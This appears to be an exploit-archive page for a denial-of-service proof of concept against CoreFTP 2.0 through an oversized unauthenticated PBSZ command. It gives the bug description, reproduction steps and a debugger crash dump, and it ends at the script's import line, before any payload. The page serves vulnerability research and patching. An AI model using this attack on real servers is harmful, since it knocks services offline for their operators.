Core ftp 2.0 build 653 pbsz denial of service (poc) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2019-03-12 |
Type : dos |
Platform : windows
This exploit / vulnerability Core ftp 2.0 build 653 pbsz denial of service (poc) is for educational purposes only and if it is used you will do on your own risk!
# Description:
# CoreFTP 2.0 is vulnerable to a DoS attack via the PBSZ command. Ironically, this command is being used for "Protection Buffer Size"
# and CoreFTP responds unauthenticated.
# The PBSZ command in CoreFTP only allows for a certain length of the string to be vulnerable to a DoS.
# This script triggers the DoS and filling ECX with the intented buffer.
# Although NSEH/SEH is overwritten, the executable binary is SafeSEH protected and no other assemblies are referenced.
# Replication:
# - Install CoreFTP and setup a domain with an IP and path
# - Start the service or click "Start"
# - No need to add users or set anything specific: just run the script and watch it crash
# Crash as service:
# (7e0.bf4): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files (x86)\CoreFTPServer\coresrvr.exe
# eax=00000000 ebx=00a5b048 ecx=42424242 edx=00000000 esi=00000258 edi=00000000
# eip=004491f5 esp=0128c4bc ebp=0129f684 iopl=0 nv up ei ng nz na po nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010282
# coresrvr+0x491f5:
# 004491f5 83b92c08000000 cmp dword ptr [ecx+82Ch],0 ds:002b:42424a6e=????????
#!/usr/bin/env python
import sys, socket, struct, time